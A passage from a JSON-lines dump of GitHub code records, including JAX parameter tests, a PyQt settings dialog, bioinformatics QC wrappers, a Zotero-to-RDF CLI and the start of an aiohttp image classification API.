repository: {repository_name}\")\n\n selected_files = files.query(\"from_zip_file == False\").query(\n f\"file_type in {file_types}\"\n )\n print(f\"Select {selected_files.shape[0]} files\")\n return repository_name, selected_files\n\n\nif __name__ == \"__main__\":\n args = get_cli_arguments()\n\n # Verify input files exist\n verify_file_exists(args.input)\n\n # Create output dir\n pathlib.Path(args.output).mkdir(parents=True, exist_ok=True)\n\n print(\"File types to download:\")\n for file_type in args.type:\n print(file_type)\n\n # Select files\n data_repo_name, target_df = select_files_to_download(args.input, args.type)\n\n # Download files\n for idx in target_df.index:\n file_path = pooch.retrieve(\n url=target_df.loc[idx, \"file_url\"],\n known_hash=f\"md5:{target_df.loc[idx, 'file_md5']}\",\n fname=target_df.loc[idx, \"file_name\"],\n path=f\"{args.output}/{data_repo_name}/{target_df.loc[idx, 'dataset_id']}\",\n progressbar=True,\n )\n","repo_name":"GiovanniBussi/mdws","sub_path":"scripts/download_files.py","file_name":"download_files.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"31611878026","text":"import copy\nimport jax.numpy as jnp\nfrom jax import jit, value_and_grad, lax\nfrom jax.tree_util import tree_map, tree_leaves\nfrom jaxtyping import Float, Array\nfrom dynamax.parameters import ParameterProperties, to_unconstrained, from_unconstrained, log_det_jac_constrain\nimport optax\nimport tensorflow_probability.substrates.jax.bijectors as tfb\nfrom typing import NamedTuple, Union\n\n\nclass InitialParams(NamedTuple):\n probs: Union[Float[Array, \"state_dim\"], ParameterProperties]\n\nclass TransitionsParams(NamedTuple):\n transition_matrix: Union[Float[Array, \"state_dim state_dim\"], ParameterProperties]\n\nclass EmissionsParams(NamedTuple):\n means: Union[Float[Array, \"state_dim emission_dim\"], ParameterProperties]\n scales: Union[Float[Array, \"state_dim emission_dim\"], ParameterProperties]\n\nclass Params(NamedTuple):\n initial: InitialParams\n transitions: TransitionsParams\n emissions: EmissionsParams\n\n\ndef make_params():\n params = Params(\n initial=InitialParams(probs=jnp.ones(3) / 3.0),\n transitions=TransitionsParams(transition_matrix=0.9 * jnp.eye(3) + 0.1 * jnp.ones((3, 3)) / 3),\n emissions=EmissionsParams(means=jnp.zeros((3, 2)), scales=jnp.ones((3, 2)))\n )\n\n props = Params(\n initial=InitialParams(probs=ParameterProperties(trainable=False, constrainer=tfb.SoftmaxCentered())),\n transitions=TransitionsParams(transition_matrix=ParameterProperties(constrainer=tfb.SoftmaxCentered())),\n emissions=EmissionsParams(means=ParameterProperties(), scales=ParameterProperties(constrainer=tfb.Softplus(), trainable=False))\n )\n return params, props\n\n\ndef test_parameter_tofrom_unconstrained():\n params, props = make_params()\n unc_params = to_unconstrained(params, props)\n recon_params = from_unconstrained(unc_params, props)\n assert all(tree_leaves(tree_map(jnp.allclose, params, recon_params)))\n\n\ndef test_parameter_pytree_jittable():\n # If there's a problem with our PyTree registration, this should catch it.\n params, props = make_params()\n\n @jit\n def get_trainable(params, props):\n # test function that includes props in its closure\n return tree_map(lambda node, prop: node if prop.trainable else None,\n params, props,\n is_leaf=lambda node: isinstance(node, ParameterProperties))\n\n # first call, jit\n get_trainable(params, props)\n assert 
get_trainable._cache_size() == 1\n\n # change param values, don't jit\n params = params._replace(initial=params.initial._replace(probs=jnp.zeros(3)))\n get_trainable(params, props)\n assert get_trainable._cache_size() == 1\n\n # change param dtype, jit\n params = params._replace(initial=params.initial._replace(probs=jnp.zeros(3, dtype=int)))\n get_trainable(params, props)\n assert get_trainable._cache_size() == 2\n\n # change props, jit\n props.transitions.transition_matrix.trainable = False\n get_trainable(params, props)\n assert get_trainable._cache_size() == 3\n\n\ndef test_parameter_constrained():\n \"\"\"Test that only trainable params are updated in gradient descent.\n \"\"\"\n params, props = make_params()\n original_params = copy.deepcopy(params)\n\n unc_params = to_unconstrained(params, props)\n def loss(unc_params):\n params = from_unconstrained(unc_params, props)\n log_initial_probs = jnp.log(params.initial.probs)\n log_transition_matrix = jnp.log(params.transitions.transition_matrix)\n means = params.emissions.means\n scales = params.emissions.scales\n\n lp = log_initial_probs[1]\n lp += log_transition_matrix[0,0]\n lp += log_transition_matrix[1,1]\n lp += log_transition_matrix[2,2]\n lp += jnp.sum(-0.5 * (1.0 - means[0])**2 / scales[0]**2)\n lp += jnp.sum(-0.5 * (2.0 - means[1])**2 / scales[1]**2)\n lp += jnp.sum(-0.5 * (3.0 - means[2])**2 / scales[2]**2)\n return -lp\n\n # Run a dummy optimization\n f = jit(value_and_grad(loss))\n optimizer = optax.adam(1e-2)\n opt_state = optimizer.init(unc_params)\n\n def step(carry, args):\n unc_params, opt_state = carry\n loss, grads = f(unc_params)\n updates, opt_state = optimizer.update(grads, opt_state)\n unc_params = optax.apply_updates(unc_params, updates)\n return (unc_params, opt_state), loss\n\n initial_carry = (unc_params, opt_state)\n (unc_params, opt_state), losses = \\\n lax.scan(step, initial_carry, None, length=10)\n params = from_unconstrained(unc_params, props)\n\n assert jnp.allclose(params.initial.probs, original_params.initial.probs)\n assert not jnp.allclose(params.transitions.transition_matrix, original_params.transitions.transition_matrix)\n assert not jnp.allclose(params.emissions.means, original_params.emissions.means)\n assert jnp.allclose(params.emissions.scales, original_params.emissions.scales)\n\n\ndef test_logdet_jacobian():\n params, props = make_params()\n unc_params = to_unconstrained(params, props)\n logdet = log_det_jac_constrain(params, props)\n\n # only the transition matrix is constrained and trainable\n f = props.transitions.transition_matrix.constrainer.forward_log_det_jacobian\n logdet_manual = f(unc_params.transitions.transition_matrix).sum()\n assert jnp.isclose(logdet, logdet_manual)\n","repo_name":"probml/dynamax","sub_path":"dynamax/parameters_test.py","file_name":"parameters_test.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"54"} +{"seq_id":"28339966396","text":"\"\"\"\nSettingsDialog class.\n\"\"\"\n\n__author__ = \"James Cook\"\n__copyright__ = \"Copyright 2021\"\n__license__ = \"GNU General Public License v3.0\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"James Cook\"\n__email__ = \"contact@cookjames.uk\"\n\n\n# external module imports\nfrom PyQt5.QtWidgets import QDialog\n\n# project module imports\nfrom qtgui.gen import SettingsDialogGenerated\nfrom qtgui.logger import init_console_logger\nfrom core.image_processing import colormaps\n\n# setup logger\nlogger = 
init_console_logger(name=\"settings_dialog\")\n\n\nclass SettingsDialog(QDialog):\n def __init__(self, config):\n super(QDialog, self).__init__()\n\n self.ui = SettingsDialogGenerated.Ui_Dialog()\n self.ui.setupUi(self)\n\n self.config = config\n self._temp_unit_index_selected = 0\n self.unit_texts = ['\\xB0C', '\\xB0F', 'K']\n\n self.init_widgets()\n self.load_settings()\n self.init_signals() # IMPORTANT - DO THIS LAST\n\n def init_signals(self):\n \"\"\"\n Initialises widget signals.\n \"\"\"\n self.ui.pushButton_apply.clicked.connect(self.apply_and_accept)\n self.ui.comboBox_temp_unit.currentIndexChanged.connect(self.temp_unit_changed)\n\n def init_widgets(self):\n \"\"\"\n Sets possible values for selection widgets.\n \"\"\"\n self.ui.comboBox_temp_unit.addItems([\"Celsius\", \"Fahrenheit\", \"Kelvin\"])\n self.ui.comboBox_colormap.addItems(colormaps)\n self.ui.comboBox_model.addItems([\"Standard\", \"Lightweight\"])\n\n def load_settings(self):\n \"\"\"\n Loads settings from the configuration dictionary passed.\n \"\"\"\n # set temp unit option\n index = self.ui.comboBox_temp_unit.findText(self.config[\"SETTINGS\"][\"temp_unit\"])\n if index == -1:\n index = 0\n logger.error(\"Error loading 'temp_unit' configuration.\")\n self.ui.comboBox_temp_unit.setCurrentIndex(index)\n self._temp_unit_index_selected = index\n self.ui.label_temp_unit.setText('(' + self.unit_texts[index] + ')')\n\n # set colormap option\n index = self.ui.comboBox_colormap.findText(self.config[\"SETTINGS\"][\"color_map\"])\n if index == -1:\n index = 0\n logger.error(\"Error loading 'color_map' configuration.\")\n self.ui.comboBox_colormap.setCurrentIndex(index)\n\n # set sound option\n try:\n enabled = bool(int(self.config[\"SETTINGS\"][\"sound\"]))\n except ValueError:\n enabled = True\n logger.error(\"Error loading 'sound' configuration.\")\n self.ui.checkBox_sound.setChecked(enabled)\n\n # set fps option\n try:\n enabled = bool(int(self.config[\"SETTINGS\"][\"fps\"]))\n except ValueError:\n enabled = True\n logger.error(\"Error loading 'fps' configuration.\")\n self.ui.checkBox_fps.setChecked(enabled)\n\n # set model option\n index = self.ui.comboBox_model.findText(self.config[\"SETTINGS\"][\"model\"])\n if index == -1:\n index = 0\n logger.error(\"Error loading 'model' configuration.\")\n self.ui.comboBox_model.setCurrentIndex(index)\n\n # set temp option\n try:\n value = float(self.config[\"SETTINGS\"][\"temp_thresh\"])\n except (ValueError, AssertionError):\n value = 38.0\n logger.error(\"Error loading 'temp_thresh' configuration.\")\n self.ui.doubleSpinBox_temp_thresh.setValue(value)\n\n # set confidence option\n try:\n value = float(self.config[\"SETTINGS\"][\"confidence_thresh\"])\n assert (0.0 <= value <= 1)\n except (ValueError, AssertionError):\n value = 0.5\n logger.error(\"Error loading 'confidence_thresh' configuration.\")\n self.ui.doubleSpinBox_confidence_thresh.setValue(value)\n\n def temp_unit_changed(self):\n \"\"\"\n Converts the values of temperatures displayed depending on\n the temperature unit selected.\n\n Called when the temperature unit is changed.\n \"\"\"\n value = self.ui.doubleSpinBox_temp_thresh.value()\n new_index = self.ui.comboBox_temp_unit.currentIndex()\n\n # from Celsius\n if self._temp_unit_index_selected == 0:\n if new_index == 1:\n value = celsius_to_fahrenheit(value)\n elif new_index == 2:\n value = celsius_to_kelvin(value)\n\n # from Fahrenheit\n elif self._temp_unit_index_selected == 1:\n if new_index == 0:\n value = fahrenheit_to_celsius(value)\n elif new_index == 2:\n 
value = fahrenheit_to_kelvin(value)\n\n # from Kelvin\n elif self._temp_unit_index_selected == 2:\n if new_index == 0:\n value = kelvin_to_celsius(value)\n elif new_index == 1:\n value = kelvin_to_fahrenheit(value)\n\n else:\n raise Exception(\"Selected index '{}' of 'comboBox_temp_unit' not found\".format(\n self._temp_unit_index_selected))\n\n self.ui.doubleSpinBox_temp_thresh.setValue(value)\n self.ui.label_temp_unit.setText('(' + self.unit_texts[new_index] + ')')\n self._temp_unit_index_selected = new_index\n\n def apply_and_accept(self):\n \"\"\"\n Applies configurations and exits.\n \"\"\"\n self.apply_settings()\n self.accept()\n\n def apply_settings(self):\n \"\"\"\n Applies selected settings to the config dictionary.\n \"\"\"\n self.config[\"SETTINGS\"][\"temp_unit\"] = str(self.ui.comboBox_temp_unit.currentText())\n self.config[\"SETTINGS\"][\"color_map\"] = str(self.ui.comboBox_colormap.currentText())\n self.config[\"SETTINGS\"][\"sound\"] = str(int(self.ui.checkBox_sound.isChecked()))\n self.config[\"SETTINGS\"][\"fps\"] = str(int(self.ui.checkBox_fps.isChecked()))\n self.config[\"SETTINGS\"][\"model\"] = str(self.ui.comboBox_model.currentText())\n self.config[\"SETTINGS\"][\"temp_thresh\"] = str(self.ui.doubleSpinBox_temp_thresh.value())\n self.config[\"SETTINGS\"][\"confidence_thresh\"] = str(self.ui.doubleSpinBox_confidence_thresh.value())\n\n\ndef kelvin_to_celsius(value):\n return value - 273.15\n\n\ndef celsius_to_kelvin(value):\n return value + 273.15\n\n\ndef kelvin_to_fahrenheit(value):\n return (value - 273.15) * 1.8 + 32\n\n\ndef fahrenheit_to_kelvin(value):\n return (value - 32) * (5/9) + 273.15\n\n\ndef celsius_to_fahrenheit(value):\n return (value * 1.8) + 32\n\n\ndef fahrenheit_to_celsius(value):\n return (value - 32) * (5/9)\n","repo_name":"dev-chip/fever-monitor","sub_path":"qtgui/settings_dialog.py","file_name":"settings_dialog.py","file_ext":"py","file_size_in_byte":6542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14769919767","text":"\nimport mlrun\nimport pandas as pd\nimport os\n\nDF_URL = os.environ[\"DF_URL\"]\ndf = None\n\n\ndef init_context(context):\n global df\n context.logger.info(\"retrieve data from {}\".format(DF_URL))\n di = mlrun.run.get_dataitem(DF_URL)\n df = di.as_df()\n\n\ndef handler(context, event):\n global df\n if df is None:\n return context.Response(\n body=\"\", headers={}, content_type=\"application/json\", status_code=500\n )\n\n # mock REST api\n method = event.method\n path = event.path\n fields = event.fields\n\n id = False\n\n # pagination\n page = 0\n pageSize = 50\n\n if \"page\" in fields:\n page = int(fields['page'])\n\n if \"size\" in fields:\n pageSize = int(fields['size'])\n\n if page < 0:\n page = 0\n\n if pageSize < 1:\n pageSize = 1\n\n if pageSize > 100:\n pageSize = 100\n\n start = page * pageSize\n end = start + pageSize\n total = len(df)\n\n if end > total:\n end = total\n\n ds = df.iloc[start:end]\n json = ds.to_json(orient=\"records\")\n\n res = {\"data\": json, \"page\": page, \"size\": pageSize, \"total\": total}\n\n return context.Response(\n body=res, headers={}, content_type=\"application/json\", status_code=200\n )\n","repo_name":"scc-digitalhub/digitalhub","sub_path":"documentation/examples/etl/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"13420357592","text":"from __future__ import 
print_function\n\n\"\"\"IMPORT DEPENDENCIES\"\"\"\nimport os\nimport sys\nimport pandas as pd\n\n\"\"\"IMPORT INTERNAL DEPENDENCIES\"\"\"\nfrom .utils import add_directory, get_files\nfrom .parallel import parallelize\n\n\"\"\"Generate read distribution profiles\"\"\"\ndef run_fastqc(\n args):\n\n file, args_dict = args[0], args[1]\n\n os.system(\n 'fastqc'\n + ' -q ' + str(args_dict['input']) + str(file)\n + ' -o ' + str(args_dict['fastqc'])\n + str(args_dict['log']))\n\n\"\"\"Parellel run of FastQC\"\"\"\ndef get_fastqc(args_dict):\n\n args_dict = add_directory(\n args_dict,\n 'output',\n 'fastqc')\n\n files = get_files(\n args_dict['input'],\n ['.fastq', '.fq', '.txt'])\n\n # Perform fastqc on each file and unzip output\n parallelize(\n run_fastqc,\n files,\n args_dict,\n mod_workers = True)\n\n\"\"\"Create MultiQC processing summary from all files in args_dict output\"\"\"\ndef get_multiqc_summary(\n args_dict):\n\n os.system(\n 'multiqc'\n + ' ' + str(args_dict['output'])\n + ' -i ' + str(args_dict['experiment'])\n + ' -o ' + args_dict['output']\n + str(args_dict['log']))\n","repo_name":"XPRESSyourself/XPRESSpipe","sub_path":"xpresspipe/quality.py","file_name":"quality.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"5660065429","text":"import json\nimport os,sys,inspect\nimport time\n\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir) \n\nfrom utils import translator\n\ninput_json_filepath = '../../resources/json_files/custom_QnA_dataset.json'\n\ntrans = 'bing'\n\nf = open(input_json_filepath, encoding='utf16')\njson_data = json.load(f)['collection']\n\n# Large text evaluation\n\n\nel_to_en = []\nen_to_el = []\n\nfor context_with_qna in json_data[:2]:\n start = time.time()\n translated_text = translator.translate(context_with_qna['context'] , trans, 'el', 'en')\n end = time.time()\n el_to_en.append({\"characters\": len(context_with_qna['context']) , \"time\":(end-start) })\n\n for question in context_with_qna['questions']:\n # For el to en\n start = time.time()\n translated_text = translator.translate(question , trans, 'el', 'en')\n end = time.time()\n el_to_en.append({\"characters\": len(question) , \"time\":(end-start) })\n\n start = time.time()\n translated_text = translator.translate(translated_text, trans, 'en', 'el')\n end = time.time()\n en_to_el.append({\"characters\": len(question) , \"time\":(end-start) })\n\nsum = 0\nfor dict in el_to_en:\n sum += dict['time']\n\nfor dict in en_to_el:\n sum += dict['time']\n\naverage_time = sum / (len(el_to_en) + len(en_to_el))\nprint('Average translation time of ' + trans + ' is ' + str(average_time) + ' seconds.')\n","repo_name":"Rantaplanb/question-answering-evaluation","sub_path":"evaluation/translators_evaluation/evaluate_translators_time_efficiency.py","file_name":"evaluate_translators_time_efficiency.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38212433305","text":"from nmk.utils import create_dir_symlink\nfrom tests.utils import NmkTester\n\n\nclass TestUtils(NmkTester):\n def test_symlink(self):\n # Create sample folder\n foo = self.test_folder / \"foo\"\n foo.mkdir()\n foo_file = foo / \"sample.txt\"\n foo_file.touch()\n\n # Create link and verify content\n bar = self.test_folder / \"bar\"\n 
create_dir_symlink(foo, bar)\n bar_file = bar / \"sample.txt\"\n assert bar_file.is_file()\n","repo_name":"dynod/nmk","sub_path":"src/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26362536770","text":"import sys\nimport os\nimport docker\nimport requests\nimport rdflib\nimport subprocess\nfrom time import sleep\nimport json\nimport click\nimport re\nfrom bs4 import BeautifulSoup\nimport logging\nimport pdftotext\nfrom urlextract import URLExtract\nfrom os.path import exists\n\n\"\"\"\nTurn lots of things into RDF.\nUse the Zotero Translation Server (https://github.com/zotero/translation-server)\nvia Docker to do most of it.\n\nUsage:\n\n$ python toRDF.py start\n\n$ python toRDF.py url 'https://heinonline.org/HOL/LandingPage?handle=hein.journals/wflr49&div=16&id=&page='\n\n$ python toRDF.py book \"Weapons of Math Destruction\"\n\n$ python toRDF.py identifier 10.1177/2053951714559253\n\n$ python toRDF.py bibtex references.bib\n\"\"\"\n\nlogging.basicConfig(level=logging.DEBUG)\n\n@click.group()\ndef cli():\n \"\"\" Translate lots of book/article identifiers into RDF.\"\"\"\n pass\n\n@cli.command()\ndef start():\n \"\"\" Start the Zotero translation server in a Docker container.\"\"\"\n client = docker.from_env()\n container = client.containers.run(\"zotero/translation-server\",\n detach=True, ports={1969:1969}, tty=True,\n stdin_open=True)\n myContainer = [cont for cont in client.containers.list() if cont == container][0]\n while myContainer.status != 'running':\n logging.info('Waiting for container to start...')\n sleep(1)\n click.echo(f\"Container ID: {myContainer}\")\n\n\n@cli.command()\n@click.argument('query', nargs=1)\ndef stop():\n \"\"\" Stop the Zotero translation server.\"\"\"\n myContainer.stop()\n\n\ndef translateURL(url):\n \"\"\"\n Get bibliographic information from a URL.\n \"\"\"\n # print(f\"Translating URL: {url}\")\n response = requests.post(\"http://127.0.0.1:1969/web\",\n data=url,\n headers={'Content-Type': 'text/plain'})\n if response.ok:\n response.encoding='utf-8'\n return response.text\n\ndef translateJSON(zoteroJSON):\n \"\"\"\n Convert the JSON format that translateURL() returns into Bibliontology RDF.\n \"\"\"\n response = requests.post('http://127.0.0.1:1969/export',\n data=zoteroJSON.encode('utf-8'),\n params={\"format\": \"rdf_bibliontology\"},\n headers={\"Content-Type\": \"application/json\"})\n if response.ok:\n return response.text\n\ndef translateBibtex(bibtex):\n \"\"\" Given a bibtex file (really a string),\n send that file to the Zotero translation server to translate it to RDF.\"\"\"\n\n if type(bibtex) != str:\n try:\n bibtex = bibtex.decode('utf-8')\n except:\n logging.error(\"I can't translate bytes or other things. 
You gotta give me a string!\")\n exit()\n bibtex = bibtex.encode('utf-8')\n response = requests.post('http://127.0.0.1:1969/import',\n data=bibtex,\n headers={\"Content-Type\": \"text/plain; charset=utf-8\"})\n if response.ok:\n return translateJSON(response.text)\n else:\n logging.error(\"Something went wrong while trying to convert bibtex.\")\n return\n\n\ndef ident2rdf(ident):\n \"\"\"\n Translate an identifier to RDF, where that identifier is one of a DOI, ISBN, arXiv ID, etc.\n \"\"\"\n response = requests.post('http://127.0.0.1:1969/search',\n data=ident,\n params={\"format\": \"rdf_bibliontology\"},\n headers={\"Content-Type\": \"text/plain\"})\n zoteroJSON = response.text if response.ok else None\n try:\n decodedJSON = json.dumps(json.loads(zoteroJSON))\n except:\n print(f\"Couldn't translate identifier: {ident}\")\n print(zoteroJSON)\n return None\n return translateJSON(decodedJSON)\n\n\ndef url2rdf(url):\n \"\"\" Converts a URL to RDF/XML. \"\"\"\n zoteroJSON = translateURL(url)\n try:\n decodedJSON = json.dumps(json.loads(zoteroJSON))\n except:\n print(f\"Couldn't translate url: {url}\")\n return None\n return translateJSON(decodedJSON)\n\n\ndef getPDFSyllabus(url, courseID):\n # Do we have it already?\n cacheFilename = f\"../syllabi/{courseID}.pdf\"\n if exists(cacheFilename):\n f = open(cacheFilename)\n else:\n f, content = downloadFile(url, '../syllabi', courseID)\n # Convert to text\n pdf = pdftotext.PDF(f)\n pdfText = \"\\n\\n\".join(pdf)\n f.close()\n return pdfText\n\n\ndef getHTMLSyllabus(url, courseID):\n \"\"\" Download a HTML syllabus.\"\"\"\n # First see if we haven't already downloaded it.\n cacheFilename = f\"../syllabi/{courseID}.html\"\n isCacheFile = exists(cacheFilename)\n if isCacheFile: # We already have it. Use the cached version\n with open(cacheFilename) as f:\n return f.read()\n else:\n # Download HTML syllabus.\n resp = requests.get(url)\n if resp.ok:\n syllabusHtml = resp.text\n with open(cacheFilename, 'w') as f:\n f.write(syllabusHtml)\n return resp.text\n else:\n logging.error(f\"Couldn't download syllabus html. 
Response: {resp.status_code}\")\n return\n\n\ndef getDocSyllabus(url):\n # TODO\n logging.error(\"Docx syllabi not handled yet\")\n return\n\n\ndef downloadFile(url, destDir, courseID):\n \"\"\" Download a file from the interwebs, and\n save it to the destination directory.\n Returns file handle and content.\"\"\"\n # First, do we have this already?\n fn = url.split('/')[-1]\n ext = fn.split('.')[-1] # Maintain file extension\n if ext not in ['.pdf', '.htm', '.doc', '.docx']:\n ext = \".html\" # Handle bare URLs that are actually HTML\n outPath = f\"{destDir}/{courseID}.{ext}\"\n if exists(outPath):\n f = open(outPath)\n return f, f.read()\n else:\n resp = requests.get(url)\n if resp.ok:\n logging.info(f\"Writing file: {outPath}\")\n content = resp.content\n with open(outPath, 'wb') as f:\n f.write(content)\n return f, content\n else:\n logging.error(f\"Received error: {resp.status_code} when trying to get file {url}\")\n return None, None\n\ndef extractHTMLBib(html):\n \"\"\"\n Extract bibliographic data from HTML, using anystyle.\n First we'll need to convert to text.\n \"\"\"\n soup = BeautifulSoup(html, features='lxml')\n text = soup.getText()\n return extractPlainTextBib(text)\n\ndef extractPlainTextBib(text):\n \"\"\"\n Try to get citations from plain text, using anystyle.\n \"\"\"\n tempfile = \"/tmp/syllabus.txt\"\n with open(tempfile, 'w') as f:\n f.write(text)\n os.system('anystyle find ' + tempfile)\n return\n\ndef extractHTMLLinks(html):\n soup = BeautifulSoup(html, features='lxml')\n links = soup.find_all('a')\n logging.debug(f\"Found {len(links)} links\")\n return [link.get('href') for link in links]\n\n\ndef extractPlainTextLinks(text):\n extractor = URLExtract()\n urls = extractor.find_urls(text)\n return urls\n\n\ndef processURLs(urls):\n \"\"\" Given a list of URLs, found in a syllabus, and probably of an article or paper,\n let's process it with Zotero, and see if we can make a bibliographic entity out of it.\"\"\"\n allItemIDs = []\n if len(urls) > 0:\n for url in urls:\n logging.info(f\"Trying url: {url}\")\n rdf = url2rdf(url)\n if rdf is not None:\n itemId = writeRDF(rdf)\n allItemIDs.append(itemId)\n logging.info(formatIDs(allItemIDs))\n return allItemIDs\n\n\ndef writeRDF(rdf, courseID):\n \"\"\" Write out the RDF to readings/.rdf.xml. \"\"\"\n # Find the item ID for each one\n fn = f\"../data/texts/ttl/{courseID}.ttl\"\n # Check to make sure we don't already have it\n if type(rdf) != str:\n logging.error(\"Hmmm this doesn't look like a string. I'd better not write it.\")\n exit()\n if exists(fn):\n logging.info(f\"Looks like we already have {fn}\")\n return\n else:\n textGraph = rdflib.Graph()\n textGraph.parse(data=rdf, format='xml')\n turtleized = textGraph.serialize(format='turtle').decode('utf-8')\n with open(fn, 'w') as f:\n f.write(turtleized)\n logging.info(f\"Wrote {fn}\")\n\ndef formatIDs(itemList):\n \"\"\"\n We have lots of zotero ids, and we want to turn these into links in RDF.\n \"\"\"\n return f\"\"\"\n ccso:hasLM {\" , \".join(itemList)} ;\n \"\"\"\n\n\ndef getISBN(query):\n \"\"\" Query the Google Books API to get an ISBN for a book. 
\"\"\"\n params = {\"q\": query}\n resp = requests.get('https://www.googleapis.com/books/v1/volumes', params=params)\n if resp.ok:\n data = json.loads(resp.text)\n firstItem = data.get('items')[0]\n isbns = [ident['identifier'] for ident in\n firstItem['volumeInfo']['industryIdentifiers']\n if ident['type']=='ISBN_13' or ident['type']=='ISBN_10']\n return max(isbns)\n else:\n logging.error(\"Something went wrong with this query.\")\n logging.error(resp)\n\n\n@cli.command()\n@click.argument('URL', nargs=1)\ndef url(url):\n \"\"\"Translate a URL to RDF,\n where the URL is a link to an article or book.\"\"\"\n rdf = url2rdf(url)\n jwriteRDF(rdf)\n click.echo(rdf)\n\n\n@cli.command()\n@click.argument('ident', nargs=1)\ndef identifier(ident):\n \"\"\"Translate a DOI, arXiv, or ISBN to RDF\"\"\"\n click.echo(ident2rdf(ident))\n\ndef processSyllabus(url, courseID):\n \"\"\" We have to put this in a separate function from syllabus(),\n for Click reasons.\"\"\"\n logging.info(f\"Processing syllabus: {url}\")\n if url.endswith('.pdf'):\n pdfText = getPDFSyllabus(url, courseID)\n if pdfText is not None:\n links = extractPlainTextLinks(pdf)\n else:\n return\n elif url.endswith('.docx'):\n docText = getDocSyllabus(url)\n links = extractPlainTextLinks(docText)\n else: # Catches .html but also bare urls\n html = getHTMLSyllabus(url, courseID)\n if html is not None:\n # First try to get data from anystyle\n bibtex = extractHTMLBib(html)\n click.echo(bibtex)\n # Then just extract the links\n links = extractHTMLLinks(html)\n if links is None:\n # Try it this way instead, if the first way didn't work\n links = extractPlainTextLinks(html)\n else:\n return\n if links is None:\n logging.error(f\"Couldn't find any links in syllabus with URL: {url}\")\n return\n textIDs = processURLs(links)\n return textIDs\n\n\n@cli.command()\n@click.argument('URL', nargs=1)\ndef syllabus(url):\n \"\"\"Download a syllabus from a URL, extract links from it,\n and create RDF from those links.\"\"\"\n processSyllabus(url, 0)\n\n@cli.command()\n@click.argument('query', nargs=1)\ndef book(query):\n \"\"\" Try to get RDF for a book, by title or similar query.\n Uses the Google Books API.\n \"\"\"\n isbn = getISBN(query)\n logging.info('ISBN: ', isbn)\n rdf = ident2rdf(isbn)\n click.echo(rdf)\n click.echo(writeRDF(rdf))\n\ndef courseIDFromFilename(fn):\n \"\"\" We have been storing course ID numbers in the filename,\n e.g. 106.bib, 106.texts.txt, etc.\n Now we just want to get that ID back from the filename.\n \"\"\"\n onlyFileName = fn.split('/')[-1] # In case it has a path\n basename = onlyFileName.split('.')[0]\n try:\n courseID = int(basename)\n logging.info(f\"Assuming course name is {courseID}.\")\n except:\n logging.info(f\"Can't derive integer from {basename}. Filename must start with an integer, so that we can keep track of course IDs.\")\n exit()\n return courseID\n\n@cli.command()\n@click.argument('bibtexfile', nargs=1)\ndef bibtex(bibtexfile):\n \"\"\" Convert Bibtex files like 10.texts.txt.bib, where 10 is the course ID, to RDF.\"\"\"\n if not (bibtexfile.endswith('.bib') or bibtexfile.endswith('.bibtex')):\n logging.error(f\"File extension of {bibtexfile} not supported. 
Must be .bib or .bibtex.\")\n exit()\n courseID = courseIDFromFilename(bibtexfile)\n with open(bibtexfile, 'r', encoding='utf-8') as fn:\n bib = fn.read()\n rdf = translateBibtex(bib)\n click.echo(rdf)\n click.echo(writeRDF(rdf, courseID))\n\n@cli.command()\n@click.argument('referencesfile', nargs=1)\ndef references(referencesfile):\n \"\"\" Convert a plain text file containing references / citations (Chicago, MLA, etc) to RDF.\n Expects file to be named 10.texts.txt. Uses Anystyle, so, the executable for anystyle must be available in the PATH\"\"\"\n if not referencesfile.endswith('.txt'):\n logging.error(f\"File extension of {referencesfile} not supported. Must be .txt.\")\n exit()\n courseID = courseIDFromFilename(referencesfile)\n cmd = [\"anystyle\", \"-f\", \"bib\", \"--stdout\", \"parse\", referencesfile]\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n bibtex = stdout.decode('utf-8')\n logging.info(f\"Here's what anystyle found: {bibtex}\")\n rdf = translateBibtex(bibtex)\n click.echo(rdf)\n click.echo(writeRDF(rdf, courseID))\n\n\nif __name__== \"__main__\":\n cli()\n # lookupORCID(\"johnson\")\n","repo_name":"JonathanReeve/data-ethics-literature-review","sub_path":"turtleize/toRDF.py","file_name":"toRDF.py","file_ext":"py","file_size_in_byte":13214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38086296516","text":"import asyncio\n\nimport aiohttp\nimport async_timeout\nimport numpy as np\nimport uvloop\nfrom aiohttp import web\nfrom aiohttp.web import FileField\nfrom aiohttp.web import HTTPBadRequest\nfrom aiohttp.web import HTTPNotFound\nfrom aiohttp.web import HTTPUnsupportedMediaType\n\nfrom classify_nsfw import caffe_preprocess_and_compute, load_model\n\n\nnsfw_net, caffe_transformer = load_model()\n\n\ndef classify(image: bytes) -> np.float64:\n scores = caffe_preprocess_and_compute(image,\n caffe_transformer=caffe_transformer,\n caffe_net=nsfw_net,\n output_layers=[\"prob\"])\n return scores[1]\n\n\nasync def fetch(session, url):\n with async_timeout.timeout(10):\n async with session.get(url) as response:\n if response.status == 404:\n raise HTTPNotFound()\n return await response.read()\n\n\nclass API(web.View):\n async def post(self):\n request = self.request\n data = await request.post()\n try:\n if data.get('url'):\n image = await fetch(session, data[\"url\"])\n elif data.get('file'):\n image = data.get('file')\n if type(image) == FileField:\n image = image.file.read()\n else:\n raise OSError(\"File is not a valid multipart file upload.\")\n else:\n raise KeyError()\n nsfw_prob = classify(image)\n text = 